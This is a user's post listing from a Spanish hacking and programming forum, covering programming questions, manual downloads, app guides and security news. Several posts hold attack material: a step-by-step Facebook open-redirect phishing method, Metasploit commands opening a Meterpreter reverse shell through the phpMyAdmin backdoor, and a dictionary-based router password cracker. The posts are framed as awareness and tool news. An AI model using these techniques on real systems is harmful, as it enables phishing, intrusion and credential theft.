Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Stiuvert

#81
Muy buenas,

Voy perdido en PHP y necesito hacer un juego para poder sacarme la asignatura, me han pedido que haga un juego llamado "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"  y que guarde las partidas (jugadores, colores etc) en una BBDD.

Como googleando no he podido encontrar nada que me ayude he decidido acudir a vosotros.


¿Cómo podría empezarlo?

Gracias  ;D
#82
Buenas,

Estaba buscando Templates Premium para hacer una web usando WordPress, y resulta que los templates de pago que he podido encontrar y descargar no se me aplican bien, por ejemplo los  "slider" no funcionan.

Me han dicho que, los desarrolladores comprueban si el dominio de la web compró el template, es decir, tienen un sistema de validación supongo. ¿Sabéis algo?


Saludos
#83
A través de Twitter pude ver un mensaje de Jonathan Funes (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) que aludía a un No-Bug de Facebook. Es decir, a algo que él consideraba un bug pero que tras haber contactado con el equipo de seguridad de la red social por excelencia, le habían dicho que eso no era un bug, algo similar a lo que le pasó a otro investigador de seguridad con una "característica" que No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Como me interesaba el tema le pedí más información, y me pasó una pequeña explicación en vídeo que os paso describir. En este caso se trata de algo bastante sencillo de reproducir, así que puedes probarlo tú mismo con tu cuenta de Facebook. La idea es aprovechar un Open-Redirect de Facebook para hacer un ataque de Phishing bastante convincente a la propia Facebook.

Paso 1: Créate una mensaje privado que solo puedas ver tú con un enlace a cualquier web que quieras usando el enlace al link de redirección que puedes ver en la imagen. Lo único que necesitas es poner la dirección al final de la URL. En este caso, cuando alguien haga clic en ese enlace irá a la página de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

Figura 1: Creando un estado que publique el link de redirección a Google.
El dominio del enlace de publicación aparece como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   

Como se puede ver, automáticamente aparece que el dominio al que apunta ese enlace es a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero realmente es un hiperenlace que lleva a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sin mostrar ningún mensaje de alerta.

Paso 2: Edita el título de la web para poner algo significativo, en este caso yo no me he complicado y he puesto que es un enlace de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, para que coincida con el dominio de publicación del enlace que Facebook creó antes.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

Figura 2: Cambiando el título del enlace publicado 

Paso 3: Borra el enlace original y pon textos sugerentes que inciten a los que lo vean a pulsar sobre él. Aquí llega la parte de ingeniería social necesaria para conseguir el call-to-action de las personas que lo vean.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

Figura 3: Poniendo textos sugerentes en la publicación del phishing 

Paso 4: Publica el estado. Como se puede ver, queda bastante aparente y parece que es un enlace a una web de Facebook.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

Figura 4: El enlace publicado parece una página de Facebook 


Paso 5: Sin embargo, como se puede ver en el enlace, el hipervínculo es a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y navegará a esa dirección sin mostrar ninguna alerta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

Figura 5: El enlace llevará a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sin dar ninguna alerta 

En este ejemplo yo he utilizado un destino que llama mucho la atención, como es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero si alguien quisiera hacer un ataque dirigido a uno de sus seguidores podría elegir un dominio en el que se simulara la página de Facebook y pidiera el usuario y la contraseña de Facebook para robársela.

En el vídeo de la demostración, Jonathan Funes usa un BeeF para infectar con un JavaScript malicioso la sesión del usuario - algo similar a lo que hicimos con la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -, pero lo más recomendable sería utilizar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para conseguir un efecto de Phishing perfecto que pudiera ponerse en cualquier dominio o subdominio que pueda engañar a la víctima.

Figura 6: Explotación del Open-Redirection en Facebook

Ten cuidado con estas cosas, porque parece que de momento Facebook no piensa corregir o añadir alguna protección extra a esta característica de compartición de enlaces y uso del Open-Redirect que tienen implementado, así que atento para no caer en esquemas de phishing porque te hayas fiado en el dominio de publicación del enlace.

Saludos Malignos!

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#84
Hacking / Guia Avanzada de Nmap 6 - PDF
Diciembre 24, 2013, 03:26:37 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Les dejo la Guía Avanzada de Nmap 6 realizada por @BufferOverCat y @jovimon, que se ha liberado en los últimos días. La guía, fruto de la colaboración del Centro Criptológico Nacional (CCN) y el Centro de
Seguridad TIC de la Comunidad Valenciana (CSIRT-cv), muestra de forma útil y práctica el funcionamiento de Nmap, detallando las técnicas que se pueden utilizar con este analizador de redes.

La guía se compone de una completa documentación sobre las
funcionalidades disponibles, que cubre las técnicas, tanto básicas como
avanzadas, de: descubrimiento de equipos, análisis de puertos,
optimización
, rendimiento, etcétera, y se muestran procedimientos
recomendados de actuación dependiendo de la tarea que se quiera
realizar. 

Se cubren dos de las principales mejoras que incluye esta versión: el
soporte completo para IPv6 y el motor de scripting de Nmap (NSE: Nmap Scripting Engine),
al que se dedica un tema entero. En este tema, se detalla el
funcionamiento del motor y se dan directrices detalladas, tanto para
entender los scripts ya creados como para crear nuevos scripts.


Sin más que dicer los dejo con la guía:

Formato: PDF
Páginas: 112

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#85
Buenas,

Tengo configurado un Servidor apache y 4 dominios con BIND, cada dominio accede a una ruta distinta, ejemplo:

www.dominio1.com --> /var/www/dominio1
www.dominio2.com --> /var/www/dominio2
www.dominio3.com --> /var/www/dominio3
www.dominio4.com --> /var/www/dominio4

Ahora me gustaría que por "VSFTPD" pudiera acceder por FTP a cada uno de los dominios anteriores. He conseguido hacer lo sencillo, que es entrar con mi dirección IP.

¿Qué archivos necesito tocar para poder hacerlo?

Un saludo
#86
Este manual va dirigido a todas aquellas personas interesadas en un tema tan en auge como la
programación de aplicaciones móviles para la plataforma Android. Se tratarán temas
dedicados a la construcción de aplicaciones nativas de la plataforma, dejando a un lado por el
momento las aplicaciones web. Es por ello por lo que el único requisito indispensable a la hora
de utilizar este manual es tener conocimientos bien asentados sobre el lenguaje de
programación Java y ciertas nociones sobre aspectos básicos del desarrollo actual como la
orientación a objetos.








Tamaño: solo 2.27 Mb.
Idioma: Español
Formato: PDF - 222 Paginas




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#87
Buenas,

Estoy haciendo un code en Python para introducir números y que cuando se introduzca uno más pequeño finalice y te diga cuantos números se han introducido.

El problema me viene en el bucle.

Código: python

#!/usr/bin/env python

num1 = int(input('Escribe un numero: '))

while (i=1):
i=i+1
num2 = int(input('Escribe un numero: '))

if (num2<num1):
break
else:
num1=num2

print 'Se han contado',i,'veces'
#88
Presentaciones y cumpleaños / Hola de nuevo!
Agosto 04, 2013, 11:40:41 AM
Muy buenas a todos, tanto usuarios nuevos como antiguos compañeros ;)


Hacia tiempo que no me pasaba por aquí y he decidido saludar para ver que tal va todo.


Me alegro que siga en pié underc0de, lastimosamente no podré participar como antiguamente pero me pasaré en mis ratos libres y echaré un pequeña mano en lo que pueda.


Un saludo
#89
Estoy haciendo unos ejercicios sobre Python para aprender la sentencia While, pero voy un poco perdido..

¿Alguien me podría explicar un poco como funciona? Los ejercicios que tengo son:


1. Pedir un número por teclado y mostrar las potencias de 2 que sean más pequeñas que el número leído anteriormente.

2. Muestra los múltiplos de 3 a partir del número 12 hasta el 42.



Saludos
#90
Hacking / Katana: Multi-Boot Security Suite!
Octubre 10, 2012, 09:22:40 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es una portátil multi-boot suite de seguridad que reúne muchas de las distribuciones actuales de seguridad y aplicaciones portátiles para ejecutarse desde un disco solo. Incluye las distribuciones que se centran en Pen-Testing, Auditoría Forense, Recuperación del Sistema, Análisis de Redes y Malware. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta también viene con más de 100 aplicaciones portátiles de Windows, tales como Wireshark, Metasploit, NMAP, Cain &amp; Abel, y muchos más.

Distribuciones:

  • Backtrack
  • Ophcrack
  • CAINE
  • Tails
  • Ultimate Boot CD
  • Trinity Rescue Kit
  • Puppy Linux
  • Derik's Boot and Nuke
  • Kon-Boot
Aplicaciones Portables para ejecutar en Windows:


  • Metasploit
  • NMAP
  • Cain &amp; Able
  • Cygwin
  • Wireshark
  • Firefox
  • PuTTY
  • the Unstoppable Copier
  • OllyDBG
  • ProcessActivityView
  • SniffPass Password Sniffer
  • ClamAV
  • IECookiesView
  • MozillaCacheView
  • FreeOTFE
  • FindSSN
  • The Sleuth Kit
  • OpenOffice
  • Muchas Otras...

Interesante herramienta para llevar siempre en nuestra memoria USB....



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#91
Recientemente se ha publicado un error de seguridad en phpMyAdmin, aunque en realidad el error de seguridad fue provocado por unos de los servidores de descarga de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


El Mirror de descargas cdnetworks-kr-1 de SourceForge fue comprometido por atacantes malintencionados, quienes modificaron el fichero de descarga No tienes permitido ver los links. Registrarse o Entrar a mi cuenta agregándole 2 archivos maliciosos que cumplen con el rol de Backdoor en el sistema, específicamente el archivo server_sync.php es el que permite a un atacante ejecutar remotamente código PHP.



A pesar de que recién ayer fue confirmada la vulnerabilidad, Metasploit ya hizo su trabajo (como siempre) y ya existe el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.



Aquí les dejo el vídeo de como explotar CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor con Metasploit:





use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid


También se recomienda a aquellos que tengan phpMyAdmin lo mejor es descargar y reinstalar phpMyAdmin para evitar cualquier tipo de problema.

Más Información:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vídeo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#92


    Conectarse a Internet mediante
redes WiFi es cada vez más habitual. La conexión WiFi, sin embargo, no está exenta de ciertos riesgos si se encuentra abierta a usuarios desconocidos, o si algún intruso descubre una brecha de seguridad.


Para proteger la información que envías y recibes de forma inalámbrica existen diferentes opciones, que resumimos en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Se trata, no obstante, de conceptos bastante avanzados.


En esta ocasión te mostramos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, un programa con tres sistemas de seguridad que nos ha parecido muy interesante y que simplifica mucho la protección de tu conexión inalámbrica..




Protección a tres bandas


WiFi Protector es una aplicación gratuita que cumple varias funciones, todas ellas encaminadas a proteger la información que se envía mediante las redes WiFi a las que te conectas habitualmente.



[list=1]
  • 1. Cifrado de datos

La primera vez que se ejecuta WiFi Protector, el programa instala un controlador que encripta la información transmitida a través del WiFi. Dicho cifrado goza de una potencia de 256 bits, mayor que la que suele estar activada por defecto en la mayoría de routers inalámbricos.


2. Túnel VPN


El protocolo VPN (Red Privada Virtual) se activa muy fácilmente a través de la opción "Get Protected". En cuestión de segundos se oculta la dirección IP real y la conexión se realiza  a través de un proxy.


Como ya No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, una conexión anónima refuerza sustancialmente la privacidad de tus datos.





Una ventaja colateral del uso del túnel VPN de WiFi Protector es que podrás acceder a páginas y servicios restringidos en el país donde te encuentres conectado.


En nuestras pruebas, por ejemplo, hemos logrado visualizar vídeos de Hulu con relativa fluidez, aunque también con alguna desconexión puntual.


3. Detección de dispositivos conectados


Además de las funciones citadas, WiFi Protector también dispone de un apartado que muestra los dispositivos conectados en tu red al mismo tiempo. Esta lista se encuentra tras el enlace "View trusted devices".





Los dispositivos que aparecen en esta ventana se clasifican dependiendo de si son o no de confianza, un valor que puedes definir para cada uno de ellos. La entrada y salida de cada uno, sobre todo de los que no son de confianza, se te notificará en todo momento.


La sencillez: un arma de doble filo


WiFi Protector se ha diseñado teniendo en cuenta a los usuarios más básicos. El programa presenta un aspecto agradable, sin opciones complicadas y con un gran botón verde que invita a proteger tu conexión WiFi.


Sin embargo, aunque los fundamentos técnicos del programa son correctos y funcionan en la mayoría de los casos, existe un problema: la falta de transparencia para los usuarios. No se sabe qué es realmente de la información cifrada a través del controlador, ni se informa de la dirección y ubicación de la IP enmascarada.


Si tienes problemas de seguridad y quieres probar fácilmente varias soluciones, una protección triple como la que ofrece WiFi Protector puede ser una alternativa interesante. Por otra parte, aquí tienes No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para proteger tu red haciendo caso al sentido común.


Fuente: Softonic
#93
Android / 9 funciones de WhatsApp que quizá no conozcas
Septiembre 08, 2012, 02:53:57 PM

¿Quién no conoce No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, la app elegida por millones de personas para comunicarse con sus amigos desde el teléfono móvil (o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta...)


Es muy probable que ya tengas WhatsApp en tu teléfono y lo uses para enviar y recibir mensajes de texto, pero ¿aprovechas todas las funciones de esta aplicación? ¿Las conoces?


En este artículo te vamos a comentar 9 cosas que puedes hacer con WhatsApp que probablemente no conozcas.


Nota: Ten encuenta que algunas opciones sólo están disponibles en las versiones de WhatsApp para ciertos dispositivos.


1. Enviar el historial de conversaciones a alguien


Desde WhatsApp puedes enviar una conversación entera por correo electrónico. En la ventana de chat, pulsa Menú y luego Más. Por último, selecciona Enviar convers. por correo en el menú.





WhatsApp creará un mensaje de correo donde se incluirá un archivo de texto con el historial de la conversación y, si así lo deseas, todas las imágenes, clips de vídeo y voz que se incluyeran en dicha conversación.


En la versión de iPhone, el método es un poco distinto. En Ajustes, elige Enviar historial de chats, y después escoge la conversación que quieres enviar.


2. Cambiar el fondo de la conversación


No tienes por qué ver siempre el mismo fondo aburrido en todas tus conversaciones. WhatsApp te permite cambiar el fondo de la ventana desde el menú Fondo. Puedes escoger imágenes de tu galería, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o ninguno.


En iPhone encontrarás la opción en Ajustes &gt; Ajustes Chat &gt; Fondo de chat.


Dos fondos incluidos en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


3. Guardar las fotos que te envían


Las imágenes y vídeos que recibes en Whatsapp se quedan grabadas en el teléfono, en la carpeta Whatsapp\media\Whatsapp Images. En Android, puedes usarlas y verlas normalmente desde la Galería, compartirlas en Facebook, usarlas como fotos para contactos, etc, mientras que en iPhone se encuentran en Fotos.


El visor multimedia de Whatsapp incluye todas las imágenes recibidas y enviadas


En Android también las puedes consultar rápidamente todas las imágenes desde la propia aplicación, usando el menú Archivos.


4. Hacer una copia de seguridad de tus conversaciones


Si tus conversaciones de WhatsApp son importantes, será mejor que hagas copias de seguridad de ellas. En la ventana principal, usa Menú para ir a la Configuración y después elige Configuración de chat.





Desde aquí puedes hacer una copia de seguridad del historial. No te preocupes, Whatsapp lo hace automáticamente cada día a las 4 de la mañana.


5. Usar Intro para enviar mensajes


¿Cuántas veces escribes varias líneas en un único mensaje de WhatsApp? Seguro que muy pocas. Por eso tienes la opción de que, en vez de enviar mensajes con la tecla Enviar, se envíen con sólo pulsar Intro.


Esta opción no está presente en la versión de iPhone de WhatsApp


Si tu teléfono tiene teclado físico, los mensaje se enviarán cuando pulses Intro. Si no, en el teclado virtual se reemplazará dicha tecla por el botón Enviar. Muy cómodo.


6. Crear accesos directos a conversaciones


¿Eres un completo adicto a Whatsapp? ¿Necesitas tener siempre a tus amigos a mano para empezar una conversación? Una opción es crear accesos directos a conversaciones en la pantalla de inicio de tu teléfono.


En Android puedes hacerlo añadiendo Widgets, pero el proceso es un poco largo y aburrido. Desde el propio Whatsapp también tienes la opción, con Crear acceso directo, en el menú de la conversación.


Accesos directos a conversaciones en un teléfono Android. En iPhone no está disponible esta opción.


7. Cambiar tu foto de perfil


En WhatsApp puedes elegir una imagen para tu perfil, evitando así que aparezcas con la foto que dicha persona te haya asignado en su teléfono.


En la configuración de WhatsApp, elige Perfil y después toca tu imagen para cambiarla desde la cámara, Galería, etc.





8. Envía mucho más que mensajes


No te conformes con enviar sólo mensajes de texto. Con Whatsapp puedes enviar también imágenes, vídeos, clip de sonido, direcciones y contactos.





9. Cambia tu estado


En WhatsApp puedes cambiar tu mensaje de estado, de modo que tus contactos sepan si estás disponible o no.


La verdad es que no mucha gente los cambia con frecuencia, porque no están muy visibles: sólo se ven en la información del contacto o iniciando una nueva conversación.


Estados de distintos contactos y ventana de elección del estado actual


En cualquier caso, puedes cambiar tu estado pulsando Estado, en el menú principal de Whatsapp.
#94
Hacking / Router Password Kracker v1.0
Septiembre 08, 2012, 02:47:19 PM
    Router Password Kracker es un programa creado por
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que sirve para recuperar la contraseña de tu router. También se puede utilizar para recuperar la contraseña de tu módem o de algunos sitios Web que están protegidos por autenticación HTTP basica.

Generalmente los routers o módems usan el mecanismo de autenticación HTTP basica para acceder a la configuracion. En palabras simples, cuando se conecta a su módem / router desde el navegador (normalmente por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, etc..), se le pedirá que introduzca el nombre de usuario y contraseña. Si olvida la contraseña, entonces no será capaz de acceder a la configuracion de su router / módem. Incluso algunos sitios web utilizan esta autenticación básica para permitir que sólo ciertos usuarios tengan acceso a su sitio.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Router Password Kracker utiliza la tecnica de recuperación de contraseña por diccionario. Por defecto viene con un archivo diccionario (passlist.txt) adecuado para Routers. En internet tambien se pueden encontrar buenos diccionarios de contraseñas (wordlist).

Para las contraseñas complejas, se pueden utilizar herramientas como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para generar ataques por fuerza bruta basados en diccionarios personalizados

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Modo de uso
  • Colocar la direccion IP del router / modem en donde dice "IP Adress".
  • Colocar el usuario del router / modem donde dice "User name". Generalmente es admin, 1234, la compañia de internet, etc.. el usuario es facil de conseguirlo con una simple busqueda en google.
  • Agregar el diccionario o wordlist en donde dice "Password dictionary file".
  • Click en "Start crack".
Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - (Descarga directa Tuchost sin publicidad)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - (Pagina oficial con publicidad)

Contraseña/Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pagina oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#95
Cada vez es más común usar una misma conexión a Internet con distintos dispositivos: móviles, tabletas, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta e incluso televisores. Hacerlo con un router es de lo más sencillo y además admite conexiones simultáneas de sobra.


¿Y qué pasa si no tienes un router? ¿Y si te conectas a través de un módem 3G como el que ofrecen al contratar tarifas de Internet móvil? No te preocupes, para esos casos existen programas comoNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Vamos a explicarte en qué consiste esta interesante aplicación.




Los fundamentos de Virtual WiFi Router


La principal función de Virtual WiFi Router es crear un entorno personalizado mediante el cual convertimos nuestro ordenador en un hotspot o punto de acceso inalámbrico.


La señal que llega al ordenador y mediante la cual este puede conectarse a Internet es reenviada mediante un protocolo de Windows para compartir esta conexión; el programa se encarga pues de activar y desactivar el servicio, así como de proporcionarle un nombre y contraseña a la red para localizarla y protegerla respectivamente.


Como es lógico, para usar Virtual WiFi Router, tu ordenador deberá tener instalada una tarjeta de red inalámbrica.


Primeros pasos de configuración


Antes de iniciar Virtual WiFi Router por primera vez es necesario configurar Windows para compartir la conexión entrante. El proceso parece algo rebuscado pero en absoluto es difícil; vamos allá.


Lo primero que tienes que hacer es activar una de las características de Microsoft .NET 3.5: los servicios de Windows Communication Foundation (WCF) que harán posible que el programa funcione y comparta la conexión. Esto se consigue desde la ruta Panel de control &gt; Programas y características &gt; Activar o desactivar las características de Windows. La opción se encuentra en el lateral de esta ventana.





Si buscas en la ventana de Características de Windows verás estas opciones; deben quedar marcadas.





A continuación tienes que activar la opción de Uso compartido del adaptador de red desde el que recibes la conexión a Internet. Para ello dirígete al Centro de redes; el acceso más rápido está en el icono de Acceso a Internet en la barra de sistema.








La opción que has de activar se encuentra dentro del apartado Cambiar configuración del adaptador. Una vez dentro, haz clic derecho en el adaptador y elige Propiedades. La pestaña que te interesa es la de Uso compartido y la opción clave es la primera.





¡Por fin! Ya está todo listo para usar Virtual WiFi Router.


Creando el punto de acceso


Ahora que tienes todo a punto, es el momento de abrir el programa y acceder a su ventana haciendo clic en el icono que se instala en la barra de sistema. Cuando se abra la ventana verás dos pestañas; de momento la que te interesa es la primera, que define la conexión a compartir (1), los parámetros bajo los que se comparte (2) y arranca el servicio (3).





De la lista desplegable Share Net From has de elegir la conexión deseada. Si es una tarjeta normal y corriente, la mayoría de las veces será Local Area Connection.


En cuanto al apartado Configure, solo tienes que especificar un nombre para localizar la red con el resto de dispositivos y una contraseña de al menos 8 caracteres para acceder a ella. Para finalizar el proceso, pulsa en Setup Hotspot y luego Start.





Y ya está. El resto del trabajo consiste en detectar la red con tus dispositivos y acceder mediante la contraseña. Ten en cuenta que si compartes una conexión de datos 3G, el límite dispuesto por la operadora puede agotarse rápidamente.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#96
GNU/Linux / Actualizar Backtrack de forma sencilla
Agosto 12, 2012, 12:31:54 PM
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.

¿Como podemos tener siempre BackTrack actualizado?
Existen numerosos scripts que facilitan el trabajo aunque ayer encontré uno muy interesante por su sencillez. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Empezamos por descargar el script escrito Python, de la siguiente forma:

wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

tar -xvf bt5up.tar

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lanzamos el script

python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por último, solamente nos toca actualizar lo que deseemos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Con este script mantener nuestro BackTrack actualizado es muy fácil.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#97
Como saben muchos, Windows lleva a cabo conexiones en segundo plano a sitios, software que trabaja en segundo plano y los peor casos de virus o troyanos. Esto último, ocaciona que nuestra conexión a Internet se reduzca aunque tengamos cerrados los programas que normalmente requieran un gran ancho de banda. Ejemplo: FTP, P2P, etc.

¿Cómo podemos analizar estas posibles conexiones?
El proceso es muy sencillo y lo explico a continuación...

Ejecutamos Símbolo del Sistema como Administrador

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Dentro de la Línea de Comandos, escribimos "netstat -b 5 &gt; activity.txt" (sin comillas)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esperamos unos minutos (3 o 4), para que pueda guardar la actividad y presionamos "CTRL+C"

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Y escribimos "activity.txt", se abrirá un archivo donde existe un registro de los procesos que estaban haciendo conexión a Internet en los minutos que esperábamos (3 o 4 minutos).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por último, nos toca revisar el registro para comprobar la existencia de algo sospechoso....Esperemos no tener nada jajaj....

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#98
Lenguaje Ensamblador para PC


Autor: Paul A. Carter
Fecha: 18 de octubre de 2006


Ver online

Mirror 1: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mirror 2: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - [Caído]
#99
ASM / Manual del Ensamblador - Curso
Agosto 09, 2012, 05:55:57 AM
Manual del Ensamblador - Curso

Formato: PDF

CONTENIDO Y DESCARGA DEL MANUAL DE ENSAMBLADOR - CURSO

Curso basico de Emsamblador
Capitulo 1
Conceptos Basicos
Capitulo 2
Programación en ensamblador
Capitulo 3
Las instrucciones del ensamblador
Capitulo 4
Las instrucciones del ensamblador (2da. Parte)
Capitulo 5
Las instrucciones del ensamblador (3era. Parte)
Capitulo 6
Interrupciones y manejo de archivos
Capitulo 7
Introducción al manejo de archivos
Manual Ensamblador
Manuales lenguaje Ensamblador español
Curso guia codigo Ensamblador gratis
Gratuito pdf programa Ensamblador
Tutorial programas Ensamblador
Tutoriales ejemplos Ensamblador
Conceptos Basicos
Información en las computadoras
Unidades de información
Sistemas numéricos
Convertir números binarios a decimales
Convertir números decimales a binarios
Sistema Hexadecimal
Métodos de representación de datos en una computadora
Código ASCII
Método BCD
Representación de punto flotante
Trabajando con el lenguaje ensamblador
Proceso de creación de un programa
Registros de la UCP
La estructura del ensamblador
Nuestro primer programa
Guardar y cargar los programas
Condiciones, ciclos y bifurcaciones
Interrupciones




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#100

Información Técnica

Videotutorial Android Básico
ESPAÑOL | Windows® XP, Vista®, Windows® 7 | 32-bit &amp; 64-bit | 600 MB
Formato: .exe, .flv, .html | Duración Total: 3 Horas
Descripción
Videotutoriales de Creación de Aplicaciones para Android
"Android es el sistema operativo de Google que ya varios fabricantes están usando para sus teléfonos de media gama y smartphones. ¿Te vas a quedar afuera de la posibilidad de generar aplicaciones y juegos para distribuir en estos teléfonos y tablets?"
Hola gente de Conocimiento Adictivo con este tutorial iniciamos con una serie de interesantísimos y muy completos cursos... espero les gusten y les puedan sacar el mayor provecho.

La finalidad de este curso videotutorial es lograr que aprendas a crear desde cero aplicaciones para el sistema operativo Android utilizando el lenguaje Java como base para crear aplicaciones nativas que se ejecuten sobre dispositivos Android y se puedan distribuir gratuítamente, o mediante cobro, en distintas tiendas de aplicaciones disponibles en la actualidad.

Aprenderás a instalar las herramientas en tu equipo, entre el entorno de desarrollo y el emulador, incluyendo el uso de la interfaz de usuario de Android para probar los juegos y aplicaciones que desarrolles.

Analizaremos cuáles son los bloques de construcción en una aplicación Android, entre Actividades, Receptores de Intenciones, Servicios y Proveedores de Contenido. Aprenderás a diseñar la interfaz de usuario y a manejar eventos de sistema.
Modo de Uso y Funcionamiento
Es realmente muy sencillo, sólo descomprimen el archivo donde deseen y dentro de la carpeta está el archivo Start.exe, si esta opción por alguna razón no inicia el tutorial, también están las opciones de inciarlo en un explorador como Internet Explorer 9, Mozilla Firefox o el Google Chrome, con el archivo start.html o desde un archivo flash (start.swf).

También es posible hacerlo un CD o DVD autoejecutable... basta con utilizar Nero o Burnaware y quemar en un disco el contenido de la carpeta ya extraído, al hacer esto obtendremos un cd/dvd autoejecutable que abrirá el curso inmediátamente introduzcas el cd en la bandeja.[/url]
En esta pequeña actualización les incluyo un trial del curso



Capturas

Así se ve nuestro archivo descomprimido...ahora sólo basta ejecutarlo y a disfrutar del curso .







Enlaces de Descarga

Videotutorial Android Básico



  VIDEOTUTORIAL 

  Español | RAR | 600 MB 

  MD5 Checksum: 955d39be5a41403144f2cba4e955d4ab (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

Web Oficial

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#101
GNU/Linux / La Biblia de Linux [USERS] [Español]
Agosto 07, 2012, 06:33:04 PM


Este libro está dirigido a todos aquellos  que quieran relacionarse (o que ya tengan relación) con el sistema  operativo GNU/Linux. Aquí se tratan los más diversos temas, de forma que  quien no conoce absolutamente nada acerca de este sistema puede  comenzar a dar sus primeros pasos con él. Por su parte, los usuarios que  ya tienen experiencia pueden encontrar conceptos útiles y formas de  desarrollar soluciones a los diferentes problemas que se presentan  habitualmente en los sistemas informáticos.
Los primeros capítulos son introductorios, y sirven para explicar la  instalación y el uso básico de Linux. A partir del Capítulo 3 se  presenta toda la información necesaria para manejar el sistema a fondo,  principalmente desde el modo texto. En los últimos capítulos se incluye  información para usuarios avanzados, así como también, direcciones para  obtener más recursos en Internet.

  Contenido: Capitulo 1: Genesis
Historia de GNU/Linux
Capitulo 2: Primeros pasos
Proceso de inicio. El sistema de archivos.
Capitulo 3: Trabajando con el modo texto
Archivos, procesos y usuarios
Capitulo 4: La programacion en el lenguaje Bash
Variables, argumentos y expresiones. Estructuras condicionales y funciones
Capitulo 5: La programacion en lenguaje Perl
Variables, arreglos, expresiones y estructuras. Bases de datos.
Capitulo 6: El modo grafico
Xwindow. Ventanas y escritorio.
Capitulo 7: GNU/Linux en red
Direcciones IP. Protocolos NNTP y FTP.
Capitulo 8: Login remoto
Telnet, Secure Shell, sshd y SSH.
Capitulo 9: Instalar un servidor web
Fetchmail. Apache. Configuracion.
Capitulo 10: El servicio NFS
Instalacion y caracteristicas.
Capitulo 11: Interconexion en red con Windows
Instalacion y configuracion de Samba
